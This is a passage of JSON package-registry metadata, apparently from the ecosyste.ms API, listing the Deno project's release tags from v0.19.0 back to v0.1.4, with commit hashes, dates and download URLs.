encies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.19.0/manifests"},{"name":"v0.18.0","sha":"7e3296dad92cee2e8b77baedfbeca38aa297928e","kind":"commit","published_at":"2019-09-13T20:40:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.18.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.18.0/manifests"},{"name":"v0.17.0","sha":"82588ec09c199683cff88097e1b90649497239c7","kind":"commit","published_at":"2019-09-04T21:15:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.17.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.17.0/manifests"},{"name":"v0.16.0","sha":"0809b06a3938868f364f1343b0de4d5d9686495d","kind":"tag","published_at":"2019-08-22T22:12:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.16.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.16.0/manifests"},{"name":"v0.15.0","sha":"58f0e9b9b1b53ca486ef38ae662b98cbde839248","kind":"commit","published_at":"2019-08-13T22:35:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.15.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.15.0/manifests"},{"name":"v0.14.0","sha":"83d5362f1d7d8589b862de57912135067a8278c7","kind":"tag","published_at":"2019-08-09T01:48:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.14.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.14.0/manifests"},{"name":"v0.13.0","sha":"b3541c38f5672ffb4a29d66dca19d88b9ecae478","kind":"commit","published_at":"2019-07-31T19:09:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.13.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.13.0/manifests"},{"name":"v0.12.0","sha":"4e248ecda9bb31478c6db7f5e76fa12b64b516a9","kind":"tag","published_at":"2019-07-16T20:09:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.12.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.12.0/manifests"},{"name":"v0.11.0","sha":"92ac616708cb067a1b895283913c5ecd25c6d873","kind":"tag","published_at":"2019-07-07T16:19:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.11.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.11.0/manifests"},{"name":"v0.10.0","sha":"c56df45355c8e68eabbfa62021e7ca7484115c0b","kind":"tag","published_at":"2019-06-25T14:11:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.10.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.10.0/manifests"},{"name":"v0.9.0","sha":"7b06aa37342c021f9f1fac99125847d134e67001","kind":"commit","published_at":"2019-06-15T16:04:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.9.0/manifests"},{"name":"v0.8.0","sha":"d60bdb6350f2583e35d020f6cebb6aa30262fbcc","kind":"commit","published_at":"2019-06-08T19:16:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.8.0/manifests"},{"name":"v0.7.0","sha":"5265bd7cb1f86af99b01d73c537d52a50df95fe2","kind":"commit","published_at":"2019-05-29T22:42:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.7.0/manifests"},{"name":"v0.6.0","sha":"22feb74ba12215597416b5531f8a557302283e79","kind":"commit","published_at":"2019-05-20T19:22:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.6.0/manifests"},{"name":"v0.5.0","sha":"23aca36d52220efbfbc07abbe165bd2c9ade2009","kind":"commit","published_at":"2019-05-11T21:19:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.5.0/manifests"},{"name":"v0.4.0","sha":"2aae09c2b869bf5d0bc5fd269464e8ac504528ea","kind":"commit","published_at":"2019-05-03T23:33:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.4.0/manifests"},{"name":"v0.3.11","sha":"3b1e2f1ad42cfebb6f2568e54c82c5ac3c8fe3d4","kind":"commit","published_at":"2019-05-03T22:05:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.11/manifests"},{"name":"v0.3.10","sha":"40d8ef1ec9f5e50017c41af8bf3b9f8454f97544","kind":"tag","published_at":"2019-04-25T20:00:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.10/manifests"},{"name":"v0.3.9","sha":"e725b26b289fbe96b679039ba4203f10f7229ab9","kind":"tag","published_at":"2019-04-25T15:46:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.9/manifests"},{"name":"v0.3.8","sha":"0796a8f2f75005df95ef6115a4bdf6dd66e58dc3","kind":"commit","published_at":"2019-04-19T15:41:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.8/manifests"},{"name":"v0.3.7","sha":"8584d80cfd26111825af5a69fc6ae4c367ad0700","kind":"commit","published_at":"2019-04-11T19:35:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.7/manifests"},{"name":"v0.3.6","sha":"744e56cb58f90acde7baf8811676021fb55b2f2a","kind":"tag","published_at":"2019-04-04T14:04:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.6/manifests"},{"name":"v0.3.5","sha":"b965c7ab367a417fb7bdde2eaf38312179e5c183","kind":"commit","published_at":"2019-03-28T20:58:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.5/manifests"},{"name":"v0.3.4","sha":"223a2adbb46cb33e75ffe861ecaff6ff7e6d555e","kind":"commit","published_at":"2019-03-20T22:54:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.4/manifests"},{"name":"v0.3.3","sha":"3dbb06e699398549e8cfabc896ef3256ab433cba","kind":"tag","published_at":"2019-03-13T18:16:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.3/manifests"},{"name":"v0.3.2","sha":"535037b519711d238dc0bfa2c4d2ffb4b17dec53","kind":"commit","published_at":"2019-03-07T02:22:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.2/manifests"},{"name":"v0.3.1","sha":"b0c7b54f692ecc866d4f70bfa384631523bbf924","kind":"commit","published_at":"2019-02-27T21:20:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.1/manifests"},{"name":"v0.3.0","sha":"a5720d9e28f7ee5868049504816405392c2821d7","kind":"commit","published_at":"2019-02-19T04:22:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.0/manifests"},{"name":"v0.2.11","sha":"b2fb8261e700c75cfb9a626ae57bbd3098e08454","kind":"commit","published_at":"2019-02-09T04:34:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.11/manifests"},{"name":"v0.2.10","sha":"c3241822522fb2b13792fe5666596888057cf829","kind":"commit","published_at":"2019-02-02T23:26:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.10/manifests"},{"name":"v0.2.9","sha":"1681bda14d1552860645e40f91f667accefe50cb","kind":"commit","published_at":"2019-01-30T03:57:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.9/manifests"},{"name":"v0.2.8","sha":"a47d545e4d0831713d0107e86cead7b4506a9bf6","kind":"commit","published_at":"2019-01-19T16:54:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.8/manifests"},{"name":"v0.2.7","sha":"eb4a19ef6ef1c5ae797fb515c45627deca65cf31","kind":"commit","published_at":"2019-01-15T01:25:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.7/manifests"},{"name":"v0.2.6","sha":"404e6f86345216c9205cabb88b19eaca762095e0","kind":"commit","published_at":"2019-01-07T22:33:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.6/manifests"},{"name":"v0.2.5","sha":"320577c131c8058ba0065f26119ce1ce18bc23d2","kind":"commit","published_at":"2019-01-01T19:30:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.5/manifests"},{"name":"v0.2.4","sha":"c6e2fffc1388cdb4411d6c2cff36c4febb7c75d5","kind":"commit","published_at":"2018-12-24T04:39:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.4/manifests"},{"name":"v0.2.3","sha":"c69d2f554d05ba9e4d09af6ae451ce5676876e61","kind":"commit","published_at":"2018-12-14T20:11:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.3/manifests"},{"name":"v0.2.2","sha":"e6121762f8bf3c531c4c60229ff4a156ae21d931","kind":"commit","published_at":"2018-12-07T22:44:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.2/manifests"},{"name":"v0.2.1","sha":"b5c6bfa0c8a3df9598211bc68db5408f5eec147d","kind":"commit","published_at":"2018-12-01T00:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.1/manifests"},{"name":"v0.2.0","sha":"d083f7271b11d87ddba90869d2bcd2cf312e77af","kind":"commit","published_at":"2018-11-16T05:23:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.0/manifests"},{"name":"v0.1.12","sha":"0c740ff85d855177d1619276154f63a36ed31557","kind":"commit","published_at":"2018-11-12T17:16:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.12","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.12/manifests"},{"name":"v0.1.11","sha":"e1d5f82d36f08b9c7a7c6233b7ce354a5cf82836","kind":"commit","published_at":"2018-11-05T22:51:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.11/manifests"},{"name":"v0.1.10","sha":"da959e8c878382ce3417ab61db8ccf1ae9a660fa","kind":"commit","published_at":"2018-10-27T15:13:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.10/manifests"},{"name":"v0.1.9","sha":"c85311dd7dbad09242633d2ee7a83fdb1cbd1d7f","kind":"commit","published_at":"2018-10-21T00:30:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.9/manifests"},{"name":"v0.1.8","sha":"d92c99eabaf28100a8d181b6f289e2e3fc295107","kind":"commit","published_at":"2018-10-12T18:44:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8/manifests"},{"name":"v0.1.7","sha":"5307aa94e14d99a226366a275e011a60161c9c39","kind":"commit","published_at":"2018-10-04T12:56:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7/manifests"},{"name":"v0.1.6","sha":"77e876388bf1b2b3959f25a1cb057a1f96c76ba7","kind":"commit","published_at":"2018-09-29T17:36:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6/manifests"},{"name":"v0.1.5","sha":"8e958d3ad68e610061e82fb9f456eab79330633e","kind":"commit","published_at":"2018-09-22T03:21:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5/manifests"},{"name":"v0.1.4","sha":"d38b3b585ca68f4bc9e95faa6c9c036dc8982575","kind":"commit","published_at":"2018-09-13T00:45:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.4","tag_url":"https://repos.ecosyste.ms/api/v